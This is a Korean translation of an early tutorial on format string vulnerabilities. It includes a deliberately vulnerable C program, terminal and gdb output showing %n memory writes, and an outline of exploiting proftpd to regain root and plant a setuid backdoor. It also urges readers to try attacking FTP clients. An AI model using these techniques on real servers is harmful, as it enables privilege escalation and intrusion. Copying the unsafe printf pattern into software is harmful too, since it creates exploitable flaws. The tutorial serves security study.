제목: 포맷 버그, 정의, 유래, 사용법 
저자: lamagra <lamagra@digibel.org> 
번역: vangelis(http://www.wowhacker.org) 

/* 번역상의 문제가 있다면 업그레이드해서 보내주시면 감사하겠습니다. */ 
                     
-------> 포맷 버그란 무엇인가 

이것의 개념은 아주 단순하다. *printf() 함수(예: printf(char *fmt,...))가 호출되고, fmt을  사용자가 공급할 때. 사용자는 fmt에 포맷스트링 %s %p %x을 입력할 때 *printf는 제공된 독립변수로 그것들을 전환한다. 문제는 *printf()가 어디에서 그 독립변수가 멈추는지를 알지 못한다는 것이다. 새로운 포맷스트링들이 제공될 때 그것은 스택상의 다음 것을 읽는다. 예를 하나 살펴보자. 

<++> ptest.c 
#include <stdarg.h> 

blaat(char *fmt,...) 
{ 
    va_list va; 
    int i; 
    char *addr; 
     
    va_start(va,fmt); 

    printf("---| begin |---\n");     
    for(i = 0;i < 5;i++) 
    { 
        addr = va_arg(va,char *); 
        printf("%p\n",addr); 
    } 
    printf("---|  end  |---\n"); 
     
    va_end(va); 
} 

main(int argc,char **argv) 
{   
    char buf[8]; 
    char *prot = (char *)0x12345678; 
     
    strncpy(buf,argv[1],8); 
     
    blaat(argv[1]); 
    printf(argv[1]); 
    putchar('\n'); 
} 
<--> 

darkstar:/tmp/temp# gcc ptest.c -optest 
darkstar:/tmp/temp# ptest blaat 
---| begin |--- 
0x12345678 
0x61616c62 
0xbfff0074 
0xbffffb24 
0x804855e 
---|  end  |--- 
blaat 

단순한 독립변수가 blaat()로 호출하기 전에 스택의 꼭대기에 5가지를 프린터하도록 만든다. 여러분들은 'prot'의 내용이자 우리의 독립변수인 buf의 내용인 0x12345678을 볼 수 있다. printf()의 출력물은 단지 우리의 독립변수이다. 그러면 그 독립변수에 몇 가지 포맷 스트링으로 그것을 다시 실행해보자. 프로그램을 다운 시키지 않기 때문에 여기서 나는 %p를 사용했다. 

darkstar:/tmp/temp# ptest AAAA%p 
---| begin |--- 
0x12345678 
0x41414141 
0xbf007025 
0xbffffb24 
0x804855e 
---|  end  |--- 
AAAA0x12345678 

지금 printf()의 출력물은 아주 흥미롭다. 그것은 'A'를 네 번 프린터했고, %p는 스택의 꼭대기에 있는 주소들에 의해 대체되었다. 여러분들이 그 독립변수에 더 많은 %p를 추가할 때 여러분들은 스택의 모든 다른 요소들이 프린터되는 것을 보게될 것이다. 


------> 어떻게 exploit 하는가? 

처음 해야할 것은 포맷 스트링의 다른 종류들을 확인하는 것이다. 
%c, %f, %d, %s, %p, %i, %n, etc 

%n은 아마도 가장 흥미로운 것인데, 그것은 그것의 독립변수에 의해 지정된 위치에 인쇄되는 바이트의 수를 쓴다. 

간단한 예: 
int q; 
printf("AAAA%n",&q); 
q = 4 after that 

우리의 이전 테스트에서 본 것처럼 buf에 복사된 우리의 독립변수는 역시 스택상에 있다. 만약 우리가 유효한 주소로 AAAA를 대체하고, 그런 다음 %n을 사용하여 그 주소에 쓴다면 어떻게 될까? 
알아보자. 

darkstar:/tmp/temp# gdb --exec=a.out --symbols=ptest 
GNU gdb 4.17 
Copyright 1998 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i586-slackware-linux"... 
(gdb) r 
Starting program: /tmp/temp/a.out 

Program received signal SIGTRAP, Trace/breakpoint trap. 
Cannot remove breakpoints because program is no longer writable. 
It might be running in another process. 
Further execution is probably impossible. 
0x8048090 in ___crt_dummy__ () 
(gdb) break *main+60 
Breakpoint 1 at 0x804821c: file ptest.c, line 30. 
(gdb) break *main+65 
Breakpoint 2 at 0x8048221: file ptest.c, line 30. 
(gdb) c 
Continuing. 
---| begin |--- 
0x12345678 
0xbffffb10 
0x6e257025 
0xbffffb00 
0x80480ee 
---|  end  |--- 

Breakpoint 1, 0x804821c in main (argc=2, argv=0xbffffba0) at ptest.c:30 
30          printf(argv[1]); 
(gdb) x/wx 0xbffffb10 
0xbffffb10:     0x00000000 
(gdb) c 
Continuing. 

Breakpoint 2, 0x8048221 in main (argc=2, argv=0xbffffba0) at ptest.c:30 
30          printf(argv[1]); 
(gdb) x/wx 0xbffffb10 
0xbffffb10:     0x0000000e 
(gdb) c 
Continuing. 
??x12345678 

Program exited with code 012. 
(gdb) q 
darkstar:/tmp/temp# 

a.out은 여러분들이 볼 수 있는 것처럼 %p가 첫번째 주소에 프린터하고, %n은 0xbfffb10에 쓰는 것처럼, 독립변수로서 \x10\xfb\xff\xbf%p%n와 함께 ptest를 실행한 단순한 프로그램이다. 아주 깔끔하지 않는가? 

이것으로 무엇을 할 수 있는가? 여러분들은 그 프로그램(PROT_WRITE 와 같은 .text로 맵핑된 지역을 제외하고) 내부의 어떤 것도 덮어쓸 수 있다. 이것은 많은 것을 의미할 수 있다. 나의 proftpd exploit에서 나는 저장된 uid와 mem에서 config의 일부를 선택했다. proftpd 데몬은 mem에 저장된 옛 uid로 변경된 이후 LIST, RETR, 등등에 있는 데이터연결을 오픈하기 위한 루트권한을 포기한다. 

일반적인 아이디어는 그 uid를 제로로 만드는 것이며, 데이터연결을 오픈하고, proftpd 내부에 루트권한을 부여하는 것이다. 로컬 엑세스의 경우 이것은 충분하며, 여러분들은 백도어를 업로드하고, CHMOD 4755((-rwsr-xr-x) proftpd는 wuftpd와는 달리 suidsgid 플래그를 허용한다. 하지만 익명 접근의 경우 여러분들은 설정 때문에 디스크에 쓸 수 없다. 이 경우에 'DenyAll' 설정을 변조한다. 해야할 다른 것들은 예를 들어 스택포인터의 마지막 바이트와 메모리의 데이터를 변경하는 것 등이다. 

새로운 glibc 버전에서 흥미로운 것은 예를 들어 %<long number>d는 심지어 snprintf()와도 작동한다는 것이다.(구버전에서는 다운되었다.) 

*- note -* 
"%.5d",5 outputs 00005 
"%.200000d" outputs 200000 bytes 
*- note -* 

이런 장점으로 여러분들은 <saved %eip>, 함수 포인터, jmp_buf의 etc 등을 바꿀 수 있다. 

이 모든 것은 아주 좋지만 가끔은 매우 힘들 수 있다. 몇몇 종류의 사용자 정의 스트링은 함수가 호출될 때 스택의 어딘가에 있어야 한다. 이것은 시간과 스택 역추적을 요한다. 가끔 여러분들은 버퍼가 도달하기 전에 몇 가지 함수로 되돌아가야 한다. 
결론: 이 취약점은 큰 문제이며, 가끔은............. 

이것은 포맷 버그에 대한 작은 소개를 결론 짓는다. 만약 여러분들이 이런 종류의 버그를 가지고 더 많은 것을 해보고 싶다면 ptest 프로그램으로 좀더 작업을 해보아라. 그리고 bsd, 리눅스, 윈도우즈 상의 ftp 프로그램을 익스플로잇팅해보도록 해라. 그것은 QUOTE 명령에 이런 종류의 취약점을 가지고 있다. 이것은 큰 문제는 아니지만 놀기에는 좋은 것이다. 


------> 끝 
http://lamagra.seKure.de